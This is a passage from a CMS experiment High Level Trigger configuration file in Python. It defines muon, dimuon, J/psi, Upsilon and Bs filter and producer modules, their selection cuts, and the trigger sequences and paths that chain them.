),\n ChargeOpt = cms.int32( -1 )\n)\nhltVertexmumuFilterJpsiMuon = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 0.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.0050 ),\n MinCosinePointingAngle = cms.double( -2.0 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerJpsiMuon\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltPreDimuon0UpsilonMuon = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltUpsilonMuonL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltTripleMuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 0.0 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 0.0 ),\n MinInvMass = cms.double( 8.5 ),\n MaxInvMass = cms.double( 11.5 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 2.5 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( False )\n)\nhltDisplacedmumuVtxProducerUpsilonMuon = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltUpsilonMuonL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltVertexmumuFilterUpsilonMuon = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 0.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.0050 ),\n MinCosinePointingAngle = cms.double( -2.0 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerUpsilonMuon\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltPreMu5L2Mu2Jpsi = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltMu5L2Mu2L1Filtered0 = cms.EDFilter( \"HLTMuonL1Filter\",\n CandTag = cms.InputTag( \"hltL1extraParticles\" ),\n PreviousCandTag = cms.InputTag( \"hltL1sL1DoubleMu0HighQ\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinN = cms.int32( 2 ),\n ExcludeSingleSegmentCSC = cms.bool( False ),\n CSCTFtag = cms.InputTag( \"unused\" ),\n saveTags = cms.bool( False ),\n SelectQualities = cms.vint32( )\n)\nhltMu5L2Mu2L2PreFiltered0 = cms.EDFilter( \"HLTMuonL2PreFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL2MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltMu5L2Mu2L1Filtered0\" ),\n SeedMapTag = cms.InputTag( \"hltL2Muons\" ),\n MinN = cms.int32( 2 ),\n MaxEta = cms.double( 2.5 ),\n MaxDr = cms.double( 9999.0 ),\n MaxDz = cms.double( 9999.0 ),\n MinPt = cms.double( 2.0 ),\n NSigmaPt = cms.double( 0.0 ),\n saveTags = cms.bool( False ),\n AbsEtaBins = cms.vdouble( 5.0 ),\n MinNstations = cms.vint32( 0 ),\n MinNhits = cms.vint32( 0 )\n)\nhltMu5L2Mu2L3Filtered5 = cms.EDFilter( \"HLTMuonL3PreFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltMu5L2Mu2L2PreFiltered0\" ),\n MinN = cms.int32( 1 ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n MinPt = cms.double( 5.0 ),\n NSigmaPt = cms.double( 0.0 ),\n saveTags = cms.bool( False )\n)\nhltMu5L2Mu2JpsiTrackMassFiltered = cms.EDFilter( \"HLTMuonTrackMassFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n TrackTag = cms.InputTag( \"hltL2MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltMu5L2Mu2L3Filtered5\" ),\n saveTags = cms.bool( True ),\n checkCharge = cms.bool( True ),\n MinTrackPt = cms.double( 2.0 ),\n MinTrackP = cms.double( 0.0 ),\n MaxTrackEta = cms.double( 999.0 ),\n MaxTrackDxy = cms.double( 999.0 ),\n MaxTrackDz = cms.double( 999.0 ),\n MinTrackHits = cms.int32( 2 ),\n MaxTrackNormChi2 = cms.double( 1.0E10 ),\n MaxDCAMuonTrack = cms.double( 99999.9 ),\n CutCowboys = cms.bool( False ),\n MinMasses = cms.vdouble( 1.8 ),\n MaxMasses = cms.vdouble( 4.5 )\n)\nhltL1sL1SingleMu3 = cms.EDFilter( \"HLTLevel1GTSeed\",\n L1UseL1TriggerObjectMaps = cms.bool( True ),\n L1NrBxInEvent = cms.int32( 3 ),\n L1TechTriggerSeeding = cms.bool( False ),\n L1UseAliasesForSeeding = cms.bool( True ),\n L1SeedsLogicalExpression = cms.string( \"L1_SingleMu3\" ),\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n L1GtObjectMapTag = cms.InputTag( \"hltL1GtObjectMap\" ),\n L1CollectionsTag = cms.InputTag( \"hltL1extraParticles\" ),\n L1MuonCollectionTag = cms.InputTag( \"hltL1extraParticles\" ),\n saveTags = cms.bool( True )\n)\nhltPreMu5Track2Jpsi = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltMu5TrackJpsiL1Filtered0 = cms.EDFilter( \"HLTMuonL1Filter\",\n CandTag = cms.InputTag( \"hltL1extraParticles\" ),\n PreviousCandTag = cms.InputTag( \"hltL1sL1SingleMu3\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinN = cms.int32( 1 ),\n ExcludeSingleSegmentCSC = cms.bool( False ),\n CSCTFtag = cms.InputTag( \"unused\" ),\n saveTags = cms.bool( False ),\n SelectQualities = cms.vint32( )\n)\nhltMu5TrackJpsiL2Filtered3 = cms.EDFilter( \"HLTMuonL2PreFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL2MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltMu5TrackJpsiL1Filtered0\" ),\n SeedMapTag = cms.InputTag( \"hltL2Muons\" ),\n MinN = cms.int32( 1 ),\n MaxEta = cms.double( 2.5 ),\n MaxDr = cms.double( 9999.0 ),\n MaxDz = cms.double( 9999.0 ),\n MinPt = cms.double( 4.5 ),\n NSigmaPt = cms.double( 0.0 ),\n saveTags = cms.bool( False ),\n AbsEtaBins = cms.vdouble( 5.0 ),\n MinNstations = cms.vint32( 0 ),\n MinNhits = cms.vint32( 0 )\n)\nhltMu5TrackJpsiL3Filtered3 = cms.EDFilter( \"HLTMuonL3PreFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltMu5TrackJpsiL2Filtered3\" ),\n MinN = cms.int32( 1 ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n MinPt = cms.double( 5.0 ),\n NSigmaPt = cms.double( 0.0 ),\n saveTags = cms.bool( False )\n)\nhltMuTrackJpsiPixelTrackSelector = cms.EDProducer( \"QuarkoniaTrackSelector\",\n muonCandidates = cms.InputTag( \"hltL3MuonCandidates\" ),\n tracks = cms.InputTag( \"hltPixelTracks\" ),\n checkCharge = cms.bool( False ),\n MinTrackPt = cms.double( 0.0 ),\n MinTrackP = cms.double( 2.5 ),\n MaxTrackEta = cms.double( 999.0 ),\n MinMasses = cms.vdouble( 2.0 ),\n MaxMasses = cms.vdouble( 4.6 )\n)\nhltMuTrackJpsiPixelTrackCands = cms.EDProducer( \"ConcreteChargedCandidateProducer\",\n src = cms.InputTag( \"hltMuTrackJpsiPixelTrackSelector\" ),\n particleType = cms.string( \"mu-\" )\n)\nhltMu5Track1JpsiPixelMassFiltered = cms.EDFilter( \"HLTMuonTrackMassFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n TrackTag = cms.InputTag( \"hltMuTrackJpsiPixelTrackCands\" ),\n PreviousCandTag = cms.InputTag( \"hltMu5TrackJpsiL3Filtered3\" ),\n saveTags = cms.bool( False ),\n checkCharge = cms.bool( True ),\n MinTrackPt = cms.double( 1.0 ),\n MinTrackP = cms.double( 2.5 ),\n MaxTrackEta = cms.double( 999.0 ),\n MaxTrackDxy = cms.double( 999.0 ),\n MaxTrackDz = cms.double( 999.0 ),\n MinTrackHits = cms.int32( 3 ),\n MaxTrackNormChi2 = cms.double( 1.0E10 ),\n MaxDCAMuonTrack = cms.double( 99999.9 ),\n CutCowboys = cms.bool( False ),\n MinMasses = cms.vdouble( 2.0 ),\n MaxMasses = cms.vdouble( 4.6 )\n)\nhltMuTrackJpsiTrackSeeds = cms.EDProducer( \"SeedGeneratorFromProtoTracksEDProducer\",\n InputCollection = cms.InputTag( \"hltMuTrackJpsiPixelTrackSelector\" ),\n InputVertexCollection = cms.InputTag( \"\" ),\n originHalfLength = cms.double( 1.0E9 ),\n originRadius = cms.double( 1.0E9 ),\n useProtoTrackKinematics = cms.bool( False ),\n useEventsWithNoVertex = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" )\n)\nhltMuTrackJpsiCkfTrackCandidates = cms.EDProducer( \"CkfTrackCandidateMaker\",\n src = cms.InputTag( \"hltMuTrackJpsiTrackSeeds\" ),\n TrajectoryBuilder = cms.string( \"hltESPMuTrackJpsiTrajectoryBuilder\" ),\n TrajectoryCleaner = cms.string( \"hltESPTrajectoryCleanerBySharedHits\" ),\n NavigationSchool = cms.string( \"SimpleNavigationSchool\" ),\n RedundantSeedCleaner = cms.string( \"CachingSeedCleanerBySharedInput\" ),\n useHitsSplitting = cms.bool( False ),\n doSeedingRegionRebuilding = cms.bool( False ),\n TransientInitialStateEstimatorParameters = cms.PSet( \n propagatorAlongTISE = cms.string( \"PropagatorWithMaterial\" ),\n numberMeasurementsForFit = cms.int32( 4 ),\n propagatorOppositeTISE = cms.string( \"PropagatorWithMaterialOpposite\" )\n ),\n cleanTrajectoryAfterInOut = cms.bool( False ),\n maxNSeeds = cms.uint32( 100000 )\n)\nhltMuTrackJpsiCtfTracks = cms.EDProducer( \"TrackProducer\",\n TrajectoryInEvent = cms.bool( True ),\n useHitsSplitting = cms.bool( False ),\n clusterRemovalInfo = cms.InputTag( \"\" ),\n alias = cms.untracked.string( \"hltMuTrackJpsiCtfTracks\" ),\n Fitter = cms.string( \"hltESPFittingSmootherRK\" ),\n Propagator = cms.string( \"hltESPRungeKuttaTrackerPropagator\" ),\n src = cms.InputTag( \"hltMuTrackJpsiCkfTrackCandidates\" ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n AlgorithmName = cms.string( \"undefAlgorithm\" ),\n NavigationSchool = cms.string( \"\" )\n)\nhltMuTrackJpsiCtfTrackCands = cms.EDProducer( \"ConcreteChargedCandidateProducer\",\n src = cms.InputTag( \"hltMuTrackJpsiCtfTracks\" ),\n particleType = cms.string( \"mu-\" )\n)\nhltMu5Track2JpsiTrackMassFiltered = cms.EDFilter( \"HLTMuonTrackMassFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n TrackTag = cms.InputTag( \"hltMuTrackJpsiCtfTrackCands\" ),\n PreviousCandTag = cms.InputTag( \"hltMu5Track1JpsiPixelMassFiltered\" ),\n saveTags = cms.bool( True ),\n checkCharge = cms.bool( True ),\n MinTrackPt = cms.double( 2.0 ),\n MinTrackP = cms.double( 2.7 ),\n MaxTrackEta = cms.double( 999.0 ),\n MaxTrackDxy = cms.double( 999.0 ),\n MaxTrackDz = cms.double( 999.0 ),\n MinTrackHits = cms.int32( 5 ),\n MaxTrackNormChi2 = cms.double( 1.0E10 ),\n MaxDCAMuonTrack = cms.double( 0.5 ),\n CutCowboys = cms.bool( False ),\n MinMasses = cms.vdouble( 2.7 ),\n MaxMasses = cms.vdouble( 3.5 )\n)\nhltL1sL1SingleMu7 = cms.EDFilter( \"HLTLevel1GTSeed\",\n L1UseL1TriggerObjectMaps = cms.bool( True ),\n L1NrBxInEvent = cms.int32( 3 ),\n L1TechTriggerSeeding = cms.bool( False ),\n L1UseAliasesForSeeding = cms.bool( True ),\n L1SeedsLogicalExpression = cms.string( \"L1_SingleMu7\" ),\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n L1GtObjectMapTag = cms.InputTag( \"hltL1GtObjectMap\" ),\n L1CollectionsTag = cms.InputTag( \"hltL1extraParticles\" ),\n L1MuonCollectionTag = cms.InputTag( \"hltL1extraParticles\" ),\n saveTags = cms.bool( True )\n)\nhltPreMu7Track7Jpsi = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltMu7TrackJpsiL1Filtered0 = cms.EDFilter( \"HLTMuonL1Filter\",\n CandTag = cms.InputTag( \"hltL1extraParticles\" ),\n PreviousCandTag = cms.InputTag( \"hltL1sL1SingleMu7\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinN = cms.int32( 1 ),\n ExcludeSingleSegmentCSC = cms.bool( False ),\n CSCTFtag = cms.InputTag( \"unused\" ),\n saveTags = cms.bool( False ),\n SelectQualities = cms.vint32( )\n)\nhltMu7TrackJpsiL2Filtered3 = cms.EDFilter( \"HLTMuonL2PreFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL2MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltMu7TrackJpsiL1Filtered0\" ),\n SeedMapTag = cms.InputTag( \"hltL2Muons\" ),\n MinN = cms.int32( 1 ),\n MaxEta = cms.double( 2.5 ),\n MaxDr = cms.double( 9999.0 ),\n MaxDz = cms.double( 9999.0 ),\n MinPt = cms.double( 6.0 ),\n NSigmaPt = cms.double( 0.0 ),\n saveTags = cms.bool( False ),\n AbsEtaBins = cms.vdouble( 5.0 ),\n MinNstations = cms.vint32( 0 ),\n MinNhits = cms.vint32( 0 )\n)\nhltMu7TrackJpsiL3Filtered3 = cms.EDFilter( \"HLTMuonL3PreFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltMu7TrackJpsiL2Filtered3\" ),\n MinN = cms.int32( 1 ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n MinPt = cms.double( 7.0 ),\n NSigmaPt = cms.double( 0.0 ),\n saveTags = cms.bool( False )\n)\nhltMu7Track6JpsiPixelMassFiltered = cms.EDFilter( \"HLTMuonTrackMassFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n TrackTag = cms.InputTag( \"hltMuTrackJpsiPixelTrackCands\" ),\n PreviousCandTag = cms.InputTag( \"hltMu7TrackJpsiL3Filtered3\" ),\n saveTags = cms.bool( False ),\n checkCharge = cms.bool( False ),\n MinTrackPt = cms.double( 6.0 ),\n MinTrackP = cms.double( 2.5 ),\n MaxTrackEta = cms.double( 999.0 ),\n MaxTrackDxy = cms.double( 999.0 ),\n MaxTrackDz = cms.double( 999.0 ),\n MinTrackHits = cms.int32( 3 ),\n MaxTrackNormChi2 = cms.double( 1.0E10 ),\n MaxDCAMuonTrack = cms.double( 99999.9 ),\n CutCowboys = cms.bool( False ),\n MinMasses = cms.vdouble( 2.0 ),\n MaxMasses = cms.vdouble( 4.6 )\n)\nhltMu7Track7JpsiTrackMassFiltered = cms.EDFilter( \"HLTMuonTrackMassFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n TrackTag = cms.InputTag( \"hltMuTrackJpsiCtfTrackCands\" ),\n PreviousCandTag = cms.InputTag( \"hltMu7Track6JpsiPixelMassFiltered\" ),\n saveTags = cms.bool( True ),\n checkCharge = cms.bool( True ),\n MinTrackPt = cms.double( 7.0 ),\n MinTrackP = cms.double( 2.7 ),\n MaxTrackEta = cms.double( 999.0 ),\n MaxTrackDxy = cms.double( 999.0 ),\n MaxTrackDz = cms.double( 999.0 ),\n MinTrackHits = cms.int32( 5 ),\n MaxTrackNormChi2 = cms.double( 1.0E10 ),\n MaxDCAMuonTrack = cms.double( 0.5 ),\n CutCowboys = cms.bool( False ),\n MinMasses = cms.vdouble( 2.7 ),\n MaxMasses = cms.vdouble( 3.5 )\n)\nhltFEDSelector = cms.EDProducer( \"EvFFEDSelector\",\n inputTag = cms.InputTag( \"rawDataCollector\" ),\n fedList = cms.vuint32( 1023 )\n)\nhltTriggerSummaryAOD = cms.EDProducer( \"TriggerSummaryProducerAOD\",\n processName = cms.string( \"@\" )\n)\nhltTriggerSummaryRAW = cms.EDProducer( \"TriggerSummaryProducerRAW\",\n processName = cms.string( \"@\" )\n)\n\nHLTL1UnpackerSequence = cms.Sequence( hltGtDigis + hltGctDigis + hltL1GtObjectMap + hltL1extraParticles )\nHLTBeamSpot = cms.Sequence( hltScalersRawToDigi + hltOnlineBeamSpot + hltOfflineBeamSpot )\nHLTBeginSequence = cms.Sequence( hltTriggerType + HLTL1UnpackerSequence + HLTBeamSpot )\nHLTMuonLocalRecoSequence = cms.Sequence( hltMuonDTDigis + hltDt1DRecHits + hltDt4DSegments + hltMuonCSCDigis + hltCsc2DRecHits + hltCscSegments + hltMuonRPCDigis + hltRpcRecHits )\nHLTL2muonrecoNocandSequence = cms.Sequence( HLTMuonLocalRecoSequence + hltL2MuonSeeds + hltL2Muons )\nHLTL2muonrecoSequence = cms.Sequence( HLTL2muonrecoNocandSequence + hltL2MuonCandidates )\nHLTDoLocalPixelSequence = cms.Sequence( hltSiPixelDigis + hltSiPixelClusters + hltSiPixelRecHits )\nHLTDoLocalStripSequence = cms.Sequence( hltSiStripExcludedFEDListProducer + hltSiStripRawToClustersFacility + hltSiStripClusters )\nHLTL3muonTkCandidateSequence = cms.Sequence( HLTDoLocalPixelSequence + HLTDoLocalStripSequence + hltL3TrajSeedOIState + hltL3TrackCandidateFromL2OIState + hltL3TkTracksFromL2OIState + hltL3MuonsOIState + hltL3TrajSeedOIHit + hltL3TrackCandidateFromL2OIHit + hltL3TkTracksFromL2OIHit + hltL3MuonsOIHit + hltL3TkFromL2OICombination + hltL3TrajSeedIOHit + hltL3TrackCandidateFromL2IOHit + hltL3TkTracksFromL2IOHit + hltL3MuonsIOHit + hltL3TrajectorySeed + hltL3TrackCandidateFromL2 )\nHLTL3muonrecoNocandSequence = cms.Sequence( HLTL3muonTkCandidateSequence + hltL3TkTracksFromL2 + hltL3MuonsLinksCombination + hltL3Muons )\nHLTL3muonrecoSequence = cms.Sequence( HLTL3muonrecoNocandSequence + hltL3MuonCandidates )\nHLTEndSequence = cms.Sequence( hltBoolEnd )\nHLTDoLocalHcalSequence = cms.Sequence( hltHcalDigis + hltHbhereco + hltHfreco + hltHoreco )\nHLTL2muonisorecoSequence = cms.Sequence( hltEcalRawToRecHitFacility + hltEcalRegionalMuonsFEDs + hltEcalRegionalMuonsRecHit + HLTDoLocalHcalSequence + hltTowerMakerForMuons + hltL2MuonIsolations )\nHLTL3muonisorecoSequence = cms.Sequence( hltPixelTracks + hltL3MuonIsolations )\nHLTMuTrackJpsiPixelRecoSequence = cms.Sequence( HLTDoLocalPixelSequence + hltPixelTracks + hltMuTrackJpsiPixelTrackSelector + hltMuTrackJpsiPixelTrackCands )\nHLTMuTrackJpsiTrackRecoSequence = cms.Sequence( HLTDoLocalStripSequence + hltMuTrackJpsiTrackSeeds + hltMuTrackJpsiCkfTrackCandidates + hltMuTrackJpsiCtfTracks + hltMuTrackJpsiCtfTrackCands )\n\nHLT_DoubleMu4_Jpsi_Displaced_v1 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDoubleMu4JpsiDisplaced + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltDoubleMu4JpsiDisplacedL3Filtered + hltDisplacedmumuVtxProducerDoubleMu4Jpsi + hltDisplacedmumuFilterDoubleMu4Jpsi + HLTEndSequence )\nHLT_DoubleMu5_Jpsi_Displaced_v1 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDoubleMu5JpsiDisplaced + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltDoubleMu5JpsiDisplacedL3Filtered + hltDisplacedmumuVtxProducerDoubleMu5Jpsi + hltDisplacedmumuFilterDoubleMu5Jpsi + HLTEndSequence )\nHLT_DoubleMu5_Jpsi_Displaced_v2 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDoubleMu5JpsiDisplaced + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltDoubleMu5JpsiDisplacedL3Filtered + hltDisplacedmumuVtxProducerDoubleMu5Jpsi + hltDisplacedmumuFilterDoubleMu5Jpsi + HLTEndSequence )\nHLT_DoubleMu4_Dimuon4_Bs_Barrel_v1 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDoubleMu4Dimuon4BsBarrel + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltDoubleMu4BarrelBsL3Filtered + hltDisplacedmumuVtxProducerBs4 + hltVertexmumuFilterBs4 + HLTEndSequence )\nHLT_DoubleMu4_Dimuon6_Bs_v1 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDoubleMu4Dimuon6Bs + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltDoubleMu4Dimuon6BsL3Filtered + hltDisplacedmumuVtxProducerBs6 + hltVertexmumuFilterBs6 + HLTEndSequence )\nHLT_DoubleMu4p5_LowMass_Displaced_v1 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDoubleMu4p5LowMassDisplaced + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltDoubleMu4p5LowMassDisplacedL3Filtered + hltDisplacedmumuVtxProducerDoubleMu4p5LowMass + hltDisplacedmumuFilterDoubleMu4p5LowMass + HLTEndSequence )\nHLT_DoubleMu5_LowMass_Displaced_v1 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDoubleMu5LowMassDisplaced + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltDoubleMu5LowMassDisplacedL3Filtered + hltDisplacedmumuVtxProducerDoubleMu5LowMass + hltDisplacedmumuFilterDoubleMu5LowMass + HLTEndSequence )\nHLT_Dimuon0_Jpsi_v6 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDimuon0Jpsi + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltJpsiL3Filtered + hltDisplacedmumuVtxProducerJpsi0 + hltVertexmumuFilterJpsi + HLTEndSequence )\nHLT_Dimuon0_Jpsi_NoVertexing_v3 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDimuon0JpsiNoVertexing + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltJpsiNoVertexingL3Filtered + HLTEndSequence )\nHLT_Dimuon0_Upsilon_v6 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDimuon0Upsilon + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltUpsilonL3Filtered + hltDisplacedmumuVtxProducerUpsilon + hltVertexmumuFilterUpsilon + HLTEndSequence )\nHLT_Dimuon6_LowMass_v1 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu3 + hltPreDimuon6LowMass + hltL1DiMuon6L1Filtered0 + HLTL2muonrecoSequence + hltL2DiMuon6L2PreFiltered0 + HLTL2muonisorecoSequence + hltDiMuon6IsoMuL2Filtered0 + HLTL3muonrecoSequence + hltDiMuon6LowMassFiltered6 + HLTL3muonisorecoSequence + hltDiMuon6IsoMuL3Filtered6 + hltDisplacedmumuVtxProducerDiMuon6LowMass + hltVertexmumuFilterDiMuon6LowMass + HLTEndSequence )\nHLT_Dimuon7_Upsilon_Barrel_v1 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDimuon7UpsilonBarrel + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltBarrelDimuon7UpsilonL3Filtered + hltDisplacedmumuVtxProducerDimuon7UpsilonBarrel + hltVertexmumuFilterDimuon7UpsilonBarrel + HLTEndSequence )\nHLT_Dimuon9_Upsilon_Barrel_v1 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDimuon9UpsilonBarrel + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltDimuon9BarrelUpsilonL3Filtered + hltDisplacedmumuVtxProducerDimuon9UpsilonBarrel + hltVertexmumuFilterDimuon9UpsilonBarrel + HLTEndSequence )\nHLT_Dimuon9_PsiPrime_v1 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDimuon9PsiPrime + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltDimuon9PsiPrimeL3Filtered + hltDisplacedmumuVtxProducerDimuon9PsiPrime + hltVertexmumuFilterDimuon9PsiPrime + HLTEndSequence )\nHLT_Dimuon10_Jpsi_Barrel_v6 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDimuon10JpsiBarrel + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltDimuon10BarrelJpsiL3Filtered + hltDisplacedmumuVtxProducerDimuon10JpsiBarrel + hltVertexmumuFilterDimuon10JpsiBarrel + HLTEndSequence )\nHLT_Dimuon11_PsiPrime_v1 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDimuon11PsiPrime + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltDimuon11PsiPrimeL3Filtered + hltDisplacedmumuVtxProducerDimuon11PsiPrime + hltVertexmumuFilterDimuon11PsiPrime + HLTEndSequence )\nHLT_Dimuon13_Jpsi_Barrel_v1 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDimuon13JpsiBarrel + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltDimuon13BarrelJpsiL3Filtered + hltDisplacedmumuVtxProducerDimuon13JpsiBarrel + hltVertexmumuFilterDimuon13JpsiBarrel + 